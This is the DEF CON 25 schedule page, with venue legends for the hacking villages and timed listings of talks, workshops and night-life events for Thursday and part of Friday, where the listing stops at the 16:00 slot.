Index of DEF CON 25 Activities


Venue Maps
Locations Legends and Info
Schedule   - Thursday  - Friday  - Saturday  - Sunday
Speaker List
Talk Title List
Talk Descriptions
DEF CON News
DEF CON 25 FAQ
DEF CON FAQ
Links to DEF CON 25 related pages


Venue Maps




Locations Legends and Info



BHV = Bio Hacking Village
     Promenade Level - Pisa room

CHV = Car Hacking Village
     Pool Level - Main Contest Area - down the esclators from Promenade South

CPV = Crypto Privacy Village
     Promenade Level - Florentine BR III

DC = DEF CON
     Emperor's Level - Track 1/101
     Emperor's Level - Track 2
     Promenade South - Track 3
     Promenade South - Track 4

DL = DemoLabs
     Promenade Level - Roman BR I & II

HHV = Hardware Hacking Village
     Pool Level - Main Contest Area - down the esclators from Promenade South

ICS = ICS Village (Industrial Control Systems)
     Pool Level - Main Contest Area - down the esclators from Promenade South

IOT = IOT Village (InternetOfThings)
     Pool Level - Main Contest Area - down the esclators from Promenade South

RCV = Reconnaissance Village
     Promenade Level - Palermo

SEV = Social Engineering
     Emperor's Level - Emperors Ballroom II

SKY = Skytalks
     Promenade Level - Verona/Tuin/Trevi

VMHV = Voting Machine Hacking Village
     Promenade Level - Roman 1

PHV, PHW = Wall of Sheep / Packet Hacking Village and Workshops
     Promenade Level - Neopolitan Ballroom & Milano VIII ( right behind the Vender Area )

WS = Workshops
     Octavius BR 1 = Promenade South
     Octavius BR 2 = Promenade South
     Octavius BR 3 = Promenade South
     Octavius BR 4 = Promenade South
     Octavius BR 5 = Promenade South

WV = Wireless Village
     Promenade Level - Florentine BR I & II

Talk/Event Schedule


 

Thursday


This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.

 

Thursday - 10:00


Return to Index  -  Locations Legend
DC - Track 1 - There's no place like 127.0.0.1 - Achieving reliable DNS rebinding in modern browsers - Luke Young
DC - Track 2 - Where are the SDN Security Talks? - Jon Medina
WS - Octavius 1 - (10:30-14:30) - A B C of Hunting - Julian Dana
WS - Octavius 4 - (10:30-14:30) - Attacking Active Directory and Advanced Methods of Defense - Adam Steed, Andrew Allen
WS - Octavius 5 - (10:30-14:30) - Building Application Security Automation with Python - Abhay Bhargav
WS - Octavius 6 - (10:30-14:30) - Introduction to Cryptographic Attacks - Matt Cheung
WS - Octavius 7 - (10:30-14:30) - Build your stack with Scapy, for fun and profit - stryngs, Jack64, zero-x

 

Thursday - 11:00


Return to Index  -  Locations Legend
DC - Track 1 - From Box to Backdoor: Using Old School Tools and Techniques to Discover Backdoors in Modern Devices - Patrick DeSantis
DC - Track 2 - Opt Out or Deauth Trying !- Anti-Tracking Bots Radios and Keystroke Injection - Weston Hecker
WS - Octavius 1 - cont...(10:30-14:30) - A B C of Hunting - Julian Dana
WS - Octavius 4 - cont...(10:30-14:30) - Attacking Active Directory and Advanced Methods of Defense - Adam Steed, Andrew Allen
WS - Octavius 5 - cont...(10:30-14:30) - Building Application Security Automation with Python - Abhay Bhargav
WS - Octavius 6 - cont...(10:30-14:30) - Introduction to Cryptographic Attacks - Matt Cheung
WS - Octavius 7 - cont...(10:30-14:30) - Build your stack with Scapy, for fun and profit - stryngs, Jack64, zero-x

 

Thursday - 12:00


Return to Index  -  Locations Legend
BillW - Office 4A on Promenade Level - Friends of Bill W -
DC - Track 1 - Porosity: A Decompiler For Blockchain-Based Smart Contracts Bytecode - Matt Suiche
DC - Track 2 - Jailbreaking Apple Watch - Max Bazaliy
WS - Octavius 1 - cont...(10:30-14:30) - A B C of Hunting - Julian Dana
WS - Octavius 4 - cont...(10:30-14:30) - Attacking Active Directory and Advanced Methods of Defense - Adam Steed, Andrew Allen
WS - Octavius 5 - cont...(10:30-14:30) - Building Application Security Automation with Python - Abhay Bhargav
WS - Octavius 6 - cont...(10:30-14:30) - Introduction to Cryptographic Attacks - Matt Cheung
WS - Octavius 7 - cont...(10:30-14:30) - Build your stack with Scapy, for fun and profit - stryngs, Jack64, zero-x

 

Thursday - 13:00


Return to Index  -  Locations Legend
DC - Track 1 - Amateur Digital Archeology - Matt 'openfly' Joyce
DC - Track 2 - Wiping out CSRF - Joe Rozner
WS - Octavius 1 - cont...(10:30-14:30) - A B C of Hunting - Julian Dana
WS - Octavius 4 - cont...(10:30-14:30) - Attacking Active Directory and Advanced Methods of Defense - Adam Steed, Andrew Allen
WS - Octavius 5 - cont...(10:30-14:30) - Building Application Security Automation with Python - Abhay Bhargav
WS - Octavius 6 - cont...(10:30-14:30) - Introduction to Cryptographic Attacks - Matt Cheung
WS - Octavius 7 - cont...(10:30-14:30) - Build your stack with Scapy, for fun and profit - stryngs, Jack64, zero-x

 

Thursday - 14:00


Return to Index  -  Locations Legend
DC - Track 1 - Hacking the Cloud - Gerald Steere, Sean Metcalf
DC - Track 2 - See no evil, hear no evil: Hacking invisibly and silently with light and sound - Matt Wixey
WS - Octavius 1 - cont...(10:30-14:30) - A B C of Hunting - Julian Dana
WS - Octavius 1 - (14:30-18:30) - Malware Triage: Malscripts Are The New Exploit Kit - Sergei Frankoff, Sean Wilson
WS - Octavius 4 - cont...(10:30-14:30) - Attacking Active Directory and Advanced Methods of Defense - Adam Steed, Andrew Allen
WS - Octavius 4 - (14:30-18:30) - Brainwashing Embedded Systems - Craig Young, Lane Thames, Jiva
WS - Octavius 5 - cont...(10:30-14:30) - Building Application Security Automation with Python - Abhay Bhargav
WS - Octavius 5 - (14:30-18:30) - Attacking and Defending 802.11ac Networks - Vivek Ramachandran, Thomas d'Otreppe
WS - Octavius 6 - cont...(10:30-14:30) - Introduction to Cryptographic Attacks - Matt Cheung
WS - Octavius 6 - (14:30-18:30) - Introduction to Practical Network Signature Development for Open Source IDS - Jack Mott, Jason Williams
WS - Octavius 7 - cont...(10:30-14:30) - Build your stack with Scapy, for fun and profit - stryngs, Jack64, zero-x
WS - Octavius 7 - (14:30-18:30) - SDR Crash Course: Hacking your way to fun and profit - Neel Pandeya, Nate Temple

 

Thursday - 15:00


Return to Index  -  Locations Legend
DC - Track 1 - Inside the "Meet Desai" Attack: Defending Distributed Targets from Distributed Attacks - CINCVolFLT (Trey Forgety)
DC - Track 2 - Real-time RFID Cloning in the Field - Dennis Maldonado
DC - Track 2 - (15:20-15:40) - Exploiting 0ld Mag-stripe information with New technology - Salvador Mendoza
WS - Octavius 1 - cont...(14:30-18:30) - Malware Triage: Malscripts Are The New Exploit Kit - Sergei Frankoff, Sean Wilson
WS - Octavius 4 - cont...(14:30-18:30) - Brainwashing Embedded Systems - Craig Young, Lane Thames, Jiva
WS - Octavius 5 - cont...(14:30-18:30) - Attacking and Defending 802.11ac Networks - Vivek Ramachandran, Thomas d'Otreppe
WS - Octavius 6 - cont...(14:30-18:30) - Introduction to Practical Network Signature Development for Open Source IDS - Jack Mott, Jason Williams
WS - Octavius 7 - cont...(14:30-18:30) - SDR Crash Course: Hacking your way to fun and profit - Neel Pandeya, Nate Temple

 

Thursday - 16:00


Return to Index  -  Locations Legend
DC - Track 1 - DEF CON 101 Panel - HighWiz, Malware Unicorn, Niki7a, Roamer, Wiseacre, Shaggy
DC - Track 2 - The Last CTF Talk You'll Ever Need: AMA with 20 years of DEF CON Capture-the-Flag organizers - Vulc@n, Hawaii John, Chris Eagle, Invisigoth, Caezar, Myles
Night Life - Sunset Park Pavilion F - DEFCON Toxic BBQ -
WS - Octavius 1 - cont...(14:30-18:30) - Malware Triage: Malscripts Are The New Exploit Kit - Sergei Frankoff, Sean Wilson
WS - Octavius 4 - cont...(14:30-18:30) - Brainwashing Embedded Systems - Craig Young, Lane Thames, Jiva
WS - Octavius 5 - cont...(14:30-18:30) - Attacking and Defending 802.11ac Networks - Vivek Ramachandran, Thomas d'Otreppe
WS - Octavius 6 - cont...(14:30-18:30) - Introduction to Practical Network Signature Development for Open Source IDS - Jack Mott, Jason Williams
WS - Octavius 7 - cont...(14:30-18:30) - SDR Crash Course: Hacking your way to fun and profit - Neel Pandeya, Nate Temple

 

Thursday - 17:00


Return to Index  -  Locations Legend
BillW - Office 4A on Promenade Level - Friends of Bill W -
DC - Track 1 - cont...(16:00-17:45) - DEF CON 101 Panel - HighWiz, Malware Unicorn, Niki7a, Roamer, Wiseacre, Shaggy
DC - Track 2 - cont...(16:00-17:45) - The Last CTF Talk You'll Ever Need: AMA with 20 years of DEF CON Capture-the-Flag organizers - Vulc@n, Hawaii John, Chris Eagle, Invisigoth, Caezar, Myles
Night Life - Sunset Park Pavilion F - cont...(16:00-22:00) - DEFCON Toxic BBQ -
WS - Octavius 1 - cont...(14:30-18:30) - Malware Triage: Malscripts Are The New Exploit Kit - Sergei Frankoff, Sean Wilson
WS - Octavius 4 - cont...(14:30-18:30) - Brainwashing Embedded Systems - Craig Young, Lane Thames, Jiva
WS - Octavius 5 - cont...(14:30-18:30) - Attacking and Defending 802.11ac Networks - Vivek Ramachandran, Thomas d'Otreppe
WS - Octavius 6 - cont...(14:30-18:30) - Introduction to Practical Network Signature Development for Open Source IDS - Jack Mott, Jason Williams
WS - Octavius 7 - cont...(14:30-18:30) - SDR Crash Course: Hacking your way to fun and profit - Neel Pandeya, Nate Temple

 

Thursday - 18:00


Return to Index  -  Locations Legend
Night Life - Sunset Park Pavilion F - cont...(16:00-22:00) - DEFCON Toxic BBQ -
Night Life - Track 4 - (18:30-20:30) - n00b Party hosted by Duo Security. - Duo Security
WS - Octavius 1 - cont...(14:30-18:30) - Malware Triage: Malscripts Are The New Exploit Kit - Sergei Frankoff, Sean Wilson
WS - Octavius 4 - cont...(14:30-18:30) - Brainwashing Embedded Systems - Craig Young, Lane Thames, Jiva
WS - Octavius 5 - cont...(14:30-18:30) - Attacking and Defending 802.11ac Networks - Vivek Ramachandran, Thomas d'Otreppe
WS - Octavius 6 - cont...(14:30-18:30) - Introduction to Practical Network Signature Development for Open Source IDS - Jack Mott, Jason Williams
WS - Octavius 7 - cont...(14:30-18:30) - SDR Crash Course: Hacking your way to fun and profit - Neel Pandeya, Nate Temple

 

Thursday - 19:00


Return to Index  -  Locations Legend
Night Life - Sunset Park Pavilion F - cont...(16:00-22:00) - DEFCON Toxic BBQ -
Night Life - Track 4 - cont...(18:30-20:30) - n00b Party hosted by Duo Security. - Duo Security

 

Thursday - 20:00


Return to Index  -  Locations Legend
Night Life - Sunset Park Pavilion F - cont...(16:00-22:00) - DEFCON Toxic BBQ -
Night Life - Track 3 - (20:30-24:00) - DEF CON Movie Night -
Night Life - Track 4 - cont...(18:30-20:30) - n00b Party hosted by Duo Security. - Duo Security

 

Thursday - 21:00


Return to Index  -  Locations Legend
Night Life - Sunset Park Pavilion F - cont...(16:00-22:00) - DEFCON Toxic BBQ -
Night Life - Track 1 - Official DEF CON Welcome Party -
Night Life - Track 1 & Chillout lounges - Official Entertainment: DJDEAD -
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night

 

Thursday - 22:00


Return to Index  -  Locations Legend
Night Life - Track 1 - cont...(21:00-27:00) - Official DEF CON Welcome Party
Night Life - Track 1 & Chillout lounges - Official Entertainment: SKITTISH AND BUS -
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night

 

Thursday - 23:00


Return to Index  -  Locations Legend
Night Life - Track 1 - cont...(21:00-27:00) - Official DEF CON Welcome Party
Night Life - Track 1 & Chillout lounges - Official Entertainment: ACID T -
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night

 

Thursday - 24:00


Return to Index  -  Locations Legend
Night Life - Track 1 - cont...(21:00-27:00) - Official DEF CON Welcome Party
Night Life - Track 1 & Chillout lounges - Official Entertainment: REID SPEED -

 

Thursday - 25:00


Return to Index  -  Locations Legend
Night Life - Track 1 - cont...(21:00-27:00) - Official DEF CON Welcome Party
Night Life - Track 1 & Chillout lounges - Official Entertainment: NINJULA -

 

Thursday - 26:00


Return to Index  -  Locations Legend
Night Life - Track 1 - cont...(21:00-27:00) - Official DEF CON Welcome Party
Night Life - Track 1 & Chillout lounges - Official Entertainment: SCOTCH AND BUBBLES -

 

Friday


This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.

 

Friday - 09:00


Return to Index  -  Locations Legend
SKY - Verona/Tuin/Trevi - Promenade Level - (09:30-09:59) - One-click Browser Defense - Brandon Dixon

 

Friday - 10:00


Return to Index  -  Locations Legend
BHV - Pisa Room - Biohacking: The Moral Imperative to Build a Better You - Tim Cannon
BHV - Pisa Room - (10:30-10:59) - The Patient as CEO - Robin Farmanfarmaian
CHV - Village Talks Outside Contest Area, Pool Level - Attacking Wireless Interfaces in Vehicles - Justin Montalbano__Bryan Gillispie
CPV - Florentine Ballroom 4 - (10:30-11:00) - Hacking on Multiparty Computation - Matt Cheung
DC - Track 1 - macOS/iOS Kernel Debugging and Heap Feng Shui - Min(Spark) Zheng, Xiangyu Liu
DC - Track 1 - (10:20-10:40) - Offensive Malware Analysis: Dissecting OSX/FruitFly via a Custom C&C Server - Patrick Wardle
DC - Track 2 - Welcome to DEF CON 25 - The Dark Tangent
DC - Track 2 - (10:20-10:40) - Hacking travel routers like it's 1999 - Mikhail Sosonkin
DC - Track 3 - The Brain's Last Stand - Garry Kasparov
DC - Track 4 - Secret Tools: Learning about Government Surveillance Software You Can't Ever See - Peyton "Foofus" Engel
DC - Track 4 - (10:20-11:35) - Panel: Meet The Feds - Andrea Matwyshyn, Terrell McSweeny, Dr. Suzanne Schwartz, Leonard Bailey, Lisa Wiswell
ICS - ICS-Village - (10:30-10:45) - Welcome to the ICS Village - Larry Vandenaweele
IOT - Main Contest Area - Inside the Alaris Infusion Pump, not too much medication por favor! - Dan Regalado @Danuxx
PHV - Milano VIII - Promenade Level - How Hackers Changed The Security Industry - Chris Wysopal
SKY - Verona/Tuin/Trevi - Promenade Level - Financial Crime 2.0 - Marcelo Mansur
VMHV - Roman 1, Promenade Level - Verified Voting - Barbara Simons, David Jefferson
WS - Octavius 1 - (10:30-14:30) - Linux Lockdown: ModSecurity and AppArmor - Jay Beale
WS - Octavius 4 - (10:30-14:30) - Scanning the Airwaves: building a cheap trunked radio/pager scanning system - Richard Henderson, Bryan Passifiume
WS - Octavius 5 - (10:30-14:30) - Introduction to x86 disassembly - DazzleCatDuo
WS - Octavius 6 - (10:30-14:30) - Mobile App Attack 2.0 - Sneha Rajguru
WS - Octavius 7 - (10:30-14:30) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick, Syler Clayton, Chris Castellano

 

Friday - 11:00


Return to Index  -  Locations Legend
BHV - Pisa Room - Psychoactive Chemicals in Combat - Amanda Plimpton/Evan Anderson
BHV - Pisa Room - (11:30-11:59) - My dog is a hacker and will steal your data! - Rafael Fontes Souza
CPV - Florentine Ballroom 3 - (11:30-12:00) - WS: Mansion Apartment Shack House: How To Explain Crypto To Practically Anyone - Tarah Wheeler
CPV - Florentine Ballroom 4 - SHA-3 vs the world - David Wong
DC - Track 1 - Rage Against the Weaponized AI Propaganda Machine - Suggy (AKA Chris Sumner)
DC - Track 2 - Weaponizing the BBC Micro:Bit - Damien "virtualabs" Cauquil
DC - Track 3 - Hacking Smart Contracts - Konstantinos Karagiannis
DC - Track 4 - cont...(10:20-11:35) - Panel: Meet The Feds - Andrea Matwyshyn, Terrell McSweeny, Dr. Suzanne Schwartz, Leonard Bailey, Lisa Wiswell
HHV - Main Contest Area, Pool Level - Workshop: Component Desoldering and Recovery -
ICS - Calibria - Fun with Modbus function code 90. - Arnaud Soullie
ICS - ICS-Village - (11:30-11:59) - Introduction to the ICS Wall - Tom Van Norman
PHV - Milano VIII - Promenade Level - When the Current Ransomware and Payload of the Day (CRAP of the day) Hits the Fan: Breaking the Bad News - Catherine J. Ullman, Chris Roberts
PHW - Neopolitan BR IV - Promenade Level - An Intro to Hunting with Splunk - Splunk
SKY - Verona/Tuin/Trevi - Promenade Level - Neutrality? We don't need no stinkin' Neutrality - Munin
VMHV - Roman 1, Promenade Level - Introduction into hacking the equipment in the village. - Sandy Clark, Harri Hurst, Matt Blaze
WV - Florentine BR I & II - Promenade Level - (11:30-11:55) - Automating Physical Home Security Through Hacking - Eric Escobar
WS - Octavius 1 - cont...(10:30-14:30) - Linux Lockdown: ModSecurity and AppArmor - Jay Beale
WS - Octavius 4 - cont...(10:30-14:30) - Scanning the Airwaves: building a cheap trunked radio/pager scanning system - Richard Henderson, Bryan Passifiume
WS - Octavius 5 - cont...(10:30-14:30) - Introduction to x86 disassembly - DazzleCatDuo
WS - Octavius 6 - cont...(10:30-14:30) - Mobile App Attack 2.0 - Sneha Rajguru
WS - Octavius 7 - cont...(10:30-14:30) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick, Syler Clayton, Chris Castellano

 

Friday - 12:00


Return to Index  -  Locations Legend
BHV - Pisa Room - The Bitcoin DNA Challenge - Keoni Gandall
BillW - Office 4A on Promenade Level - Friends of Bill W -
CHV - Village Talks Outside Contest Area, Pool Level - Autosar SecOC – Secure On-Board Comms - Jeff Quesnelle
CPV - Florentine Ballroom 3 - WS: Breaking the Uber Badge Ciphers - Kevin Hulin
CPV - Florentine Ballroom 4 - Alice and Bob are Slightly Less Confused - David Huerta
DC - Track 1 - CITL and the Digital Standard - A Year Later - Sarah Zatko
DC - Track 2 - Open Source Safe Cracking Robots - Combinations Under 1 Hour! (Is it bait? Damn straight it is.) - Nathan Seidle
DC - Track 3 - A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! - Orange Tsai
DC - Track 4 - Hacking Democracy: A Socratic Dialogue - Mr. Sean Kanuck
PHV - Milano VIII - Promenade Level - Iron Sights for Your Data - Leah Figueroa
PHW - Neopolitan BR IV - Promenade Level - cont...(11:00-12:30) - An Intro to Hunting with Splunk - Splunk
SKY - Verona/Tuin/Trevi - Promenade Level - Gun control - You cant put the Genie back into its bottle - Michael E. Taylor, Attorney at Law
VMHV - Roman 1, Promenade Level - Session on legal considerations of hacking election machines. - Joseph Hall, Candice Hoke
WV - Florentine BR I & II - Promenade Level - Hacking Some More of The Wireless World - Balint Seeber
WS - Octavius 1 - cont...(10:30-14:30) - Linux Lockdown: ModSecurity and AppArmor - Jay Beale
WS - Octavius 4 - cont...(10:30-14:30) - Scanning the Airwaves: building a cheap trunked radio/pager scanning system - Richard Henderson, Bryan Passifiume
WS - Octavius 5 - cont...(10:30-14:30) - Introduction to x86 disassembly - DazzleCatDuo
WS - Octavius 6 - cont...(10:30-14:30) - Mobile App Attack 2.0 - Sneha Rajguru
WS - Octavius 7 - cont...(10:30-14:30) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick, Syler Clayton, Chris Castellano

 

Friday - 13:00


Return to Index  -  Locations Legend
BHV - Pisa Room - Tales from a healthcare hacker - Kevin Sacco
BHV - Pisa Room - (13:30-13:59) - Implants: Show and Tell - c00p3r
CHV - Village Talks Outside Contest Area, Pool Level - (13:30-14:30) - Grand Theft Radio (Stopping SDR Relay Attacks on PKES) - Weston Hecker
CPV - Florentine Ballroom 3 - WS: FeatherDuster and Cryptanalib workshop - Daniel Crowley
CPV - Florentine Ballroom 4 - Protecting Users' Privacy in a Location-Critical Enterprise: The Challenges of 9-1-1 Location - Trey Forgety
DC - Track 1 - Controlling IoT devices with crafted radio signals - Caleb Madrigal
DC - Track 2 - Teaching Old Shellcode New Tricks - Josh Pitts
DC - Track 3 - Starting the Avalanche: Application DoS In Microservice Architectures - Scott Behrens, Jeremy Heffner
DC - Track 4 - Next-Generation Tor Onion Services - Roger Dingledine
HHV - Main Contest Area, Pool Level - Robo-Sumo -
ICS - Calibria - What's the DFIRence for ICS? - Chris Sistrunk
IOT - Main Contest Area - Hide Yo Keys, Hide Yo Car - Remotely Exploiting Connected Vehicle APIs and Apps - Aaron Guzman @scriptingxss
PHV - Milano VIII - Promenade Level - CVE IDs and How to Get Them - Daniel Adinolfi, Anthony Singleton
PHW - Neopolitan BR IV - Promenade Level - Reverse Engineering Malware 101 - Malware Unicorn
SKY - Verona/Tuin/Trevi - Promenade Level - From OPSUCK to OPSEXY: An OPSEC Primer - H0m3l3ss, Steve Pordon, and minion
VMHV - Roman 1, Promenade Level - Brief history of election machine hacking and lessons learned so far and why it is hard to tell the difference between incompetence and malice. - Harri Hurst
WV - Florentine BR I & II - Promenade Level - cont...(12:00-13:25) - Hacking Some More of The Wireless World - Balint Seeber
WV - Florentine BR I & II - Promenade Level - (13:30-13:55) - Wireless Threat Modeling and Monitoring - WiNT - BASIM ALTINOK
WS - Octavius 1 - cont...(10:30-14:30) - Linux Lockdown: ModSecurity and AppArmor - Jay Beale
WS - Octavius 4 - cont...(10:30-14:30) - Scanning the Airwaves: building a cheap trunked radio/pager scanning system - Richard Henderson, Bryan Passifiume
WS - Octavius 5 - cont...(10:30-14:30) - Introduction to x86 disassembly - DazzleCatDuo
WS - Octavius 6 - cont...(10:30-14:30) - Mobile App Attack 2.0 - Sneha Rajguru
WS - Octavius 7 - cont...(10:30-14:30) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick, Syler Clayton, Chris Castellano

 

Friday - 14:00


Return to Index  -  Locations Legend
BHV - Pisa Room - Sensory Augmentation 101 - Trevor Goodman
BHV - Pisa Room - (14:30-14:59) - Health as a service... - Julian Dana
CHV - Village Talks Outside Contest Area, Pool Level - cont...(13:30-14:30) - Grand Theft Radio (Stopping SDR Relay Attacks on PKES) - Weston Hecker
CHV - Village Talks Outside Contest Area, Pool Level - (14:30-15:30) - Abusing Smart Cars with QR codes - Vlad Gostomelsky
CPV - Florentine Ballroom 4 - Breaking TLS: A Year in Incremental Privacy Improvements - Andrew Brandt
DC - Track 1 - Using GPS Spoofing to control time - David "Karit" Robinson
DC - Track 2 - Death By 1000 Installers; on macOS, it's all broken! - Patrick Wardle
DC - Track 3 - Breaking the x86 Instruction Set - Christopher Domas
DC - Track 4 - How we created the first SHA-1 collision and what it means for hash security - Elie Bursztein
HHV - Main Contest Area, Pool Level - cont...(13:00-15:00) - Robo-Sumo -
ICS - Octavius 6 - (14:30-18:30) - Industrial Control System Security 101 and 201- SOLD OUT - Matthew E. Luallen, Nadav Erez
IOT - Main Contest Area - (14:40-15:30) - Pwning the Industrial IoT: RCEs and backdoors are around! - Vladimir Dashchenko @raka_baraka & Sergey Temnikov
PHV - Milano VIII - Promenade Level - You're Going to Connect to the Wrong Domain - Sam Erb
PHV - Milano VIII - Promenade Level - (14:40-14:59) - XSS FTW - What Can Really Be Done With Cross-Site Scripting - Brute Logic
PHW - Neopolitan BR IV - Promenade Level - cont...(13:00-14:30) - Reverse Engineering Malware 101 - Malware Unicorn
RCV - Palermo room, Promenade level - (14:20-14:55) - It’s Going To Get Worse Before It Gets Better - The Future of Recon Data Mining - Shane McDougal
RCV - Palermo room, Promenade level - (14:55-15:40) - An Introduction to Graph Theory for OSINT - Andrew Hay
SKY - Verona/Tuin/Trevi - Promenade Level - Advanced DNS Exfil - Nolan and Cory
VMHV - Roman 1, Promenade Level - What are the national security implications of cyber attacks on our voting systems? What are the motivations of our adversaries, and how should the U.S. respond to the threat? - General Douglas Lute
WS - Octavius 1 - cont...(10:30-14:30) - Linux Lockdown: ModSecurity and AppArmor - Jay Beale
WS - Octavius 1 - (14:30-18:30) - Penetration Testing in Hostile Environments: Client & Tester Security - Wesley McGrew, Brad Pierce
WS - Octavius 4 - cont...(10:30-14:30) - Scanning the Airwaves: building a cheap trunked radio/pager scanning system - Richard Henderson, Bryan Passifiume
WS - Octavius 4 - (14:30-18:30) - Windows - The Undiscovered country - Chuck Easttom
WS - Octavius 5 - cont...(10:30-14:30) - Introduction to x86 disassembly - DazzleCatDuo
WS - Octavius 5 - (14:30-18:30) - Subverting Privacy Exploitation Using HTTP - Eijah
WS - Octavius 6 - cont...(10:30-14:30) - Mobile App Attack 2.0 - Sneha Rajguru
WS - Octavius 6 - (14:30-18:30) - Industrial Control System Security 101 and 201 - Matthew E. Luallen, Nadav Erez
WS - Octavius 7 - cont...(10:30-14:30) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick, Syler Clayton, Chris Castellano
WS - Octavius 7 - (14:30-18:30) - Advanced Wireless Attacks Against Enterprise Networks - Gabriel Ryan

 

Friday - 15:00


Return to Index  -  Locations Legend
BHV - Pisa Room - Computational Chemistry on a Budget - Mr. Br!ml3y
BHV - Pisa Room - (15:30-15:59) - Trigraph: An Ethereum-based Teleradiology Application - Ryan Schmoll and Peter Hefley
CHV - Village Talks Outside Contest Area, Pool Level - cont...(14:30-15:30) - Abusing Smart Cars with QR codes - Vlad Gostomelsky
CPV - Florentine Ballroom 3 - WS: NoiseSocket: Extending Noise to Make Every TCP Connection Secure - Dmitry Dain, Alexey Ermishkin
CPV - Florentine Ballroom 4 - A New Political Era: Time to start wearing tin-foil hats following the 2016 elections? - Joel Wallenstrom, Robby Mook
DC - Track 1 - Assembly Language is Too High Level - XlogicX
DC - Track 2 - Phone system testing and other fun tricks - "Snide" Owen
DC - Track 3 - Dark Data - Svea Eckert, Andreas Dewes
DC - Track 4 - Abusing Certificate Transparency Logs - Hanno Böck
ICS - Calibria - (15:30-15:59) - How to create dark buildings with light speed. - Thomas Brandstetter
ICS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201- SOLD OUT - Matthew E. Luallen, Nadav Erez
IOT - Main Contest Area - cont...(14:40-15:30) - Pwning the Industrial IoT: RCEs and backdoors are around! - Vladimir Dashchenko @raka_baraka & Sergey Temnikov
Night Life - The Nobu Hotel in Caesars Palace - Women, Wisdom & Wine - IOActive
PHV - Milano VIII - Promenade Level - IP Spoofing - Marek Majkowski
PHW - Neopolitan BR IV - Promenade Level - Serious Intro to Python for Admins - Davin Potts
RCV - Palermo room, Promenade level - cont...(14:55-15:40) - An Introduction to Graph Theory for OSINT - Andrew Hay
RCV - Palermo room, Promenade level - (15:40-16:25) - Into the Bird’s Nest: A Comprehensive Look at Twitter as a Research Tool - Tracy Z. Maleeff
SKY - Verona/Tuin/Trevi - Promenade Level - Death Numbers in Surgical room, Attacking Anesthesia Equipment. - Michael Hudson
VMHV - Roman 1, Promenade Level - Common misconceptions and false parallels about voting technology. We can do online banking and use ATMs, why cant we vote on touch screens or online? - Joseph Hall
WV - Florentine BR I & II - Promenade Level - Deceptacon: Wi-Fi Deception in under $5 - Vivek Ramachandran and Nishant Sharma and Ashish Bangale
WS - Octavius 1 - cont...(14:30-18:30) - Penetration Testing in Hostile Environments: Client & Tester Security - Wesley McGrew, Brad Pierce
WS - Octavius 4 - cont...(14:30-18:30) - Windows - The Undiscovered country - Chuck Easttom
WS - Octavius 5 - cont...(14:30-18:30) - Subverting Privacy Exploitation Using HTTP - Eijah
WS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201 - Matthew E. Luallen, Nadav Erez
WS - Octavius 7 - cont...(14:30-18:30) - Advanced Wireless Attacks Against Enterprise Networks - Gabriel Ryan

 

Friday - 16:00


Return to Index  -  Locations Legend
BHV - Pisa Room - Blockchain's Role in the Disruption of the Medical Industry - John Bass
BHV - Pisa Room - (16:30-16:59) - Neurogenic Peptides: Smart Drugs 4-Minute Mile - Gingerbread
CHV - Village Talks Outside Contest Area, Pool Level - DefCon Unofficial Badges Panel - #BadgeLife Badge Makers
CPV - Florentine Ballroom 3 - Underhanded Crypto Announcement
CPV - Florentine Ballroom 4 - Security Analysis of the Telegram IM - Tomas Susanka
CPV - Florentine Ballroom 4 - (16:30-17:30) - Cryptanalysis in the Time of Ransomware - Mark Mager
DC - Track 1 - Radio Exploitation 101: Characterizing, Contextualizing, and Applying Wireless Attack Methods - Matt Knight, Marc Newlin
DC - Track 2 - The Adventures of AV and the Leaky Sandbox - Itzik Kotler, Amit Klein
DC - Track 3 - An ACE Up the Sleeve: Designing Active Directory DACL Backdoors - Andy Robbins, Will Schroeder
DC - Track 4 - "Tick, Tick, Tick. Boom! You're Dead." — Tech & the FTC - Whitney Merrill, Terrell McSweeny
HHV - Main Contest Area, Pool Level - Workshop: Component Desoldering and Recovery -
ICS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201- SOLD OUT - Matthew E. Luallen, Nadav Erez
IOT - Main Contest Area - IoT - the gift that keeps on giving - Alex "Jay" Balan @Jaymzu
Night Life - The Nobu Hotel in Caesars Palace - cont...(15:00-17:00) - Women, Wisdom & Wine - IOActive
PHV - Milano VIII - Promenade Level - Layer 8 and Why People are the Most Important Security Tool - Damon Small
PHW - Neopolitan BR IV - Promenade Level - cont...(15:00-16:30) - Serious Intro to Python for Admins - Davin Potts
RCV - Palermo room, Promenade level - cont...(15:40-16:25) - Into the Bird’s Nest: A Comprehensive Look at Twitter as a Research Tool - Tracy Z. Maleeff
RCV - Palermo room, Promenade level - (16:25-16:45) - Up close and personal - Keeping an eye on mobile applications - Mikhail Sosonkin
SEV - Emperors BR II - Thematic Social Engineering - Robert Wood
SEV - Emperors BR II - (16:55-17:25) - Beyond Phishing - Building and Sustaining a Corporate SE Program - Fahey Owens
SKY - Verona/Tuin/Trevi - Promenade Level - All The Sales President's Men - Patrick McNeil
VMHV - Roman 1, Promenade Level - How did we get here: A history of voting technology, hanging chads, and the Help America Vote Act. This segment will feature a punch card machine and demo what can go wrong with it. - Matt Blaze
WV - Florentine BR I & II - Promenade Level - Designing an Automatic Gain Control - Robert Ghilduta
WS - Octavius 1 - cont...(14:30-18:30) - Penetration Testing in Hostile Environments: Client & Tester Security - Wesley McGrew, Brad Pierce
WS - Octavius 4 - cont...(14:30-18:30) - Windows - The Undiscovered country - Chuck Easttom
WS - Octavius 5 - cont...(14:30-18:30) - Subverting Privacy Exploitation Using HTTP - Eijah
WS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201 - Matthew E. Luallen, Nadav Erez
